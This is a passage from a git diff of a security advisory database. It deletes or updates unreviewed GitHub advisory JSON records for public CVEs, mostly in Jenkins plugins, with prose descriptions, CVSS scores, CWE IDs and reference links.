"cwe_ids": [ - "CWE-311" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json b/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json deleted file mode 100644 index 9b3f604c00778..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vcgj-j8c5-2h52", - "modified": "2022-05-13T01:36:52Z", - "published": "2022-05-13T01:36:52Z", - "aliases": [ - "CVE-2017-2649" - ], - "details": "It was found that the Active Directory Plugin for Jenkins up to and including version 2.2 did not verify certificates of the Active Directory server, thereby enabling Man-in-the-Middle attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2649" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/96986" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-07-27T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json b/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json deleted file mode 100644 index c313827b96c7a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vf2c-w49g-3xf3", - "modified": "2023-10-25T18:31:25Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10387" - ], - "details": "A missing permission check in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10387" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json b/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json index 06be2f4defcd9..8d589ec09223a 100644 --- a/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json +++ b/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vfq3-4hcr-qmqp", - "modified": "2022-05-24T19:05:20Z", + "modified": "2024-01-31T21:31:02Z", "published": "2022-05-24T19:05:20Z", "aliases": [ "CVE-2020-29215" ], "details": "A Cross Site Scripting in SourceCodester Employee Management System 1.0 allows the user to execute alert messages via /Employee Management System/addemp.php on admin account.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json b/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json deleted file mode 100644 index 5346d799e86ab..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vhh3-mvc4-hhq6", - "modified": "2022-05-13T01:18:20Z", - "published": "2022-05-13T01:18:20Z", - "aliases": [ - "CVE-2017-1000388" - ], - "details": "Jenkins Dependency Graph Viewer plugin 0.12 and earlier did not perform permission checks for the API endpoint that modifies the dependency graph, allowing anyone with Overall/Read permission to modify this data.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000388" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-10-23/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-26T02:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json b/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json index 927f0bd29660c..ae735adaa9e79 100644 --- a/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json +++ b/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vm5j-fpc2-73xx", - "modified": "2022-05-02T03:48:18Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-02T03:48:18Z", "aliases": [ "CVE-2009-3759" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to hijack the authentication of administrators for (1) requests that change the password via the username parameter to config/changepw.php or (2) stop a virtual machine via the stop_vmname parameter to hardstopvm.php. NOTE: some of these details are obtained from third party information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json b/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json deleted file mode 100644 index 9d705ae556bc3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vrh7-99jh-3fmm", - "modified": "2022-05-02T06:10:33Z", - "published": "2022-05-02T06:10:33Z", - "aliases": [ - "CVE-2010-0156" - ], - "details": "Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/daemonout, (2) /tmp/puppetdoc.txt, (3) /tmp/puppetdoc.tex, or (4) /tmp/puppetdoc.aux temporary file.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0156" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502881" - }, - { - "type": "WEB", - "url": "https://puppet.com/security/cve/cve-2010-0156" - }, - { - "type": "WEB", - "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087" - }, - { - "type": "WEB", - "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2" - }, - { - "type": "WEB", - "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html" - }, - { - "type": "WEB", - "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38766" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-59" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-03-03T19:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json b/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json deleted file mode 100644 index 849290edf5e76..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vv4q-2w98-4v8g", - "modified": "2023-03-01T03:30:29Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10427" - ], - "details": "Jenkins Aqua MicroScanner Plugin 1.0.7 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10427" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1507" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json index 93a4d90a39edb..e48e7276f0966 100644 --- a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json +++ b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vw3x-5825-83ph", - "modified": "2022-05-02T06:20:12Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-02T06:20:12Z", "aliases": [ "CVE-2010-1208" ], "details": "Use-after-free vulnerability in the attribute-cloning functionality in the DOM implementation in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to execute arbitrary code via vectors related to deletion of an event attribute node with a nonzero reference count.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json b/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json index e2e2e3e370bb8..a4948ed6ffe36 100644 --- a/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json +++ b/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json @@ -34,6 +34,10 @@ "type": "WEB", "url": "https://lkml.org/lkml/2013/3/11/501" }, + { + "type": "WEB", + "url": "http://git.chromium.org/gitweb/?p=chromiumos/third_party/kernel.git%3Ba=commit%3Bh=c79efdf2b7f68f985922a8272d64269ecd490477" + }, { "type": "WEB", "url": "http://git.chromium.org/gitweb/?p=chromiumos/third_party/kernel.git;a=commit;h=c79efdf2b7f68f985922a8272d64269ecd490477" diff --git a/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json b/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json deleted file mode 100644 index 5e2266b50ddb4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-w327-wq28-3vmf", - "modified": "2022-05-02T03:56:59Z", - "published": "2022-05-02T03:56:59Z", - "aliases": [ - "CVE-2009-4665" - ], - "details": "Directory traversal vulnerability in CuteSoft_Client/CuteEditor/Load.ashx in CuteSoft Components Cute Editor for ASP.NET allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4665" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/50727" - }, - { - "type": "WEB", - "url": "http://www.exploit-db.com/exploits/8785" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/35085" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-03-05T18:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json b/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json index d632def9ddfac..0e9a6c79bf5ee 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json +++ b/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11236" }, + { + "type": "WEB", + "url": "http://linux.bkbits.net:8080/linux-2.6/cset%4043483fddCiQX1WyG_orbko06TrjMVA" + }, { "type": "WEB", "url": "http://linux.bkbits.net:8080/linux-2.6/cset@43483fddCiQX1WyG_orbko06TrjMVA" @@ -45,7 +49,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-401" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json b/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json index 2a939430c4654..43ae937e2e85b 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json +++ b/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w3mr-x868-44rj", - "modified": "2022-05-17T02:18:26Z", + "modified": "2024-02-02T18:30:20Z", "published": "2022-05-17T02:18:26Z", "aliases": [ "CVE-2008-5038" ], "details": "Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of \"Get NCP Extension Information By Name\" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -61,7 +64,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json b/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json deleted file mode 100644 index 0effb7c3ec4c7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-w55x-q3gv-px85", - "modified": "2022-05-24T22:01:18Z", - "published": "2022-05-24T22:01:18Z", - "aliases": [ - "CVE-2018-17572" - ], - "summary": "Cross-site Scripting in InfluxDB", - "details": "InfluxDB 0.9.5 has Reflected XSS in the Write Data module.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17572" - }, - { - "type": "WEB", - "url": "https://gist.github.com/Raghavrao29/1cb84f1f2d8ce993fd7b2d1366d35f48" - }, - { - "type": "WEB", - "url": "https://github.com/influxdata/influxdb/releases/tag/v0.9.6" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-03-02T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json b/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json index d088825e14858..a15c4874cf3e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json +++ b/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/" @@ -109,6 +117,10 @@ "type": "WEB", "url": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2021/Feb/42" @@ -117,6 +129,10 @@ "type": "WEB", "url": "http://seclists.org/fulldisclosure/2021/Jan/79" }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/01/26/3" @@ -136,6 +152,14 @@ { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/14/2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json b/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json deleted file mode 100644 index c7d8f667b414d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-w736-qv86-vq94", - "modified": "2022-05-17T05:28:57Z", - "published": "2022-05-17T05:28:57Z", - "aliases": [ - "CVE-2010-3714" - ], - "details": "The jumpUrl (aka access tracking) implementation in tslib/class.tslib_fe.php in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 does not properly compare certain hash values during access-control decisions, which allows remote attackers to read arbitrary files via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3714" - }, - { - "type": "WEB", - "url": "http://blog.nibblesec.org/2010/12/typo3-sa-2010-020-typo3-sa-2010-022.html" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2121" - }, - { - "type": "WEB", - "url": "http://www.exploit-db.com/exploits/15856" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/43786" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-10-25T20:01:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json b/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json deleted file mode 100644 index c54ba126e3872..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wg7x-vf54-9qjw", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003058" - ], - "details": "A cross-site request forgery vulnerability in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003058" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json b/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json deleted file mode 100644 index f38df909baefd..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-whcg-2364-672f", - "modified": "2022-05-13T01:15:02Z", - "published": "2022-05-13T01:15:02Z", - "aliases": [ - "CVE-2019-10290" - ], - "details": "A missing permission check in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10290" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json b/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json index b5f5d6d93a903..c02ab05e83508 100644 --- a/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json +++ b/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json @@ -53,7 +53,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json b/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json index b120d9f815f83..eaade1d21bbf6 100644 --- a/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json +++ b/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-whx8-pphh-55mv", - "modified": "2022-05-01T02:06:57Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:06:57Z", "aliases": [ "CVE-2005-2293" ], "details": "Oracle Formsbuilder 9.0.4 stores database usernames and passwords in a temporary file, which is not deleted after it is used, which allows local users to obtain sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json b/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json deleted file mode 100644 index b1f76e57cfa69..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wmq3-24jm-m8xh", - "modified": "2022-05-13T01:15:01Z", - "published": "2022-05-13T01:15:01Z", - "aliases": [ - "CVE-2019-10280" - ], - "details": "Jenkins Assembla Auth Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10280" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1093" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json b/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json deleted file mode 100644 index 42af4ecab7b4b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wp79-cpv2-9g7m", - "modified": "2022-05-14T03:45:21Z", - "published": "2022-05-14T03:45:21Z", - "aliases": [ - "CVE-2017-1000502" - ], - "details": "Users with permission to create or configure agents in Jenkins 1.37 and earlier could configure an EC2 agent to run arbitrary shell commands on the master node whenever the agent was supposed to be launched. Configuration of these agents now requires the 'Run Scripts' permission typically only granted to administrators.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000502" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-12-06/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-78" - ], - "severity": "HIGH", - "github_reviewed": false, 